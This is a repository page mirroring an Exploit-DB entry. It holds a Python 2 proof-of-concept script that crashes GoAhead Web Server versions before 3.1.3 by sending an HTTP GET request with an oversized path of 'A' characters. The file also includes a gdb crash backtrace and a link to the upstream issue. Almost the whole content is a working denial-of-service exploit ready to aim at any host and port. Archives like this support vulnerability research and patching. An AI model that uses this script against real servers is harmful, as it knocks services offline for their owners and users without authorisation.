bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/dos/31915.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

49 lines
No EOL
2.2 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
'''
GoAhead Web Server version prior to 3.1.3 is vulnerable to DoS. A fix exists for version 3.2.
The Web Server crashes completely once this requests is received. The vulnerability doesn't seem to be exploitable on Linux versions ... could be wrong :) !
Official Issue Post:
https://github.com/embedthis/goahead/issues/77
(gdb) bt
#0 0x00007ffff7a50425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1 0x00007ffff7a53b8b in __GI_abort () at abort.c:91
#2 0x00007ffff7a8e39e in __libc_message (do_abort=2, fmt=0x7ffff7b98748 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201
#3 0x00007ffff7a98b96 in malloc_printerr (action=3, str=0x7ffff7b98838 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:5039
#4 0x00007ffff7fdc607 in termWebs (wp=0x40cfc0, reuse=<optimized out>) at src/http.c:457
#5 0x00007ffff7fdc91b in reuseConn (wp=0x40cfc0) at src/http.c:520
#6 complete (wp=0x40cfc0, reuse=1) at src/http.c:575
#7 0x00007ffff7fdd85f in websPump (wp=0x40cfc0) at src/http.c:837
#8 0x00007ffff7fdeac8 in readEvent (wp=0x40cfc0) at src/http.c:797
#9 socketEvent (wptr=0x40cfc0, mask=2, sid=<optimized out>) at src/http.c:735
#10 socketEvent (sid=<optimized out>, mask=2, wptr=0x40cfc0) at src/http.c:723
#11 0x00007ffff7fdee38 in websAccept (sid=1, ipaddr=0x7fffffffd990 "127.0.0.1", port=54172, listenSid=<optimized out>) at src/http.c:714
#12 0x00007ffff7feb66a in socketAccept (sp=0x40cb80) at src/socket.c:327
#13 0x00007ffff7feb7c8 in socketDoEvent (sp=0x40cb80) at src/socket.c:639
#14 socketProcess () at src/socket.c:623
#15 0x00007ffff7fd93ed in websServiceEvents (finished=0x4030f0) at src/http.c:1290
#16 0x00000000004012ee in main (argc=<optimized out>, argv=0x7fffffffdfd8, envp=<optimized out>) at src/goahead.c:146
'''
import socket
import os
import sys
import struct
HOST = sys.argv[1]
PORT = int(sys.argv[2])
crash = '?'*1 + 'A' * 1000
payload = 'GET ' + crash + ' HTTP/1.1\r\n'
payload += 'Host: ' + HOST + ':' + str(PORT) + '\r\n\r\n'
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((HOST,PORT))
expl.send(payload)
data = expl.recv(1024)
print data
expl.close()
Reference in a new issue View git blame Copy permalink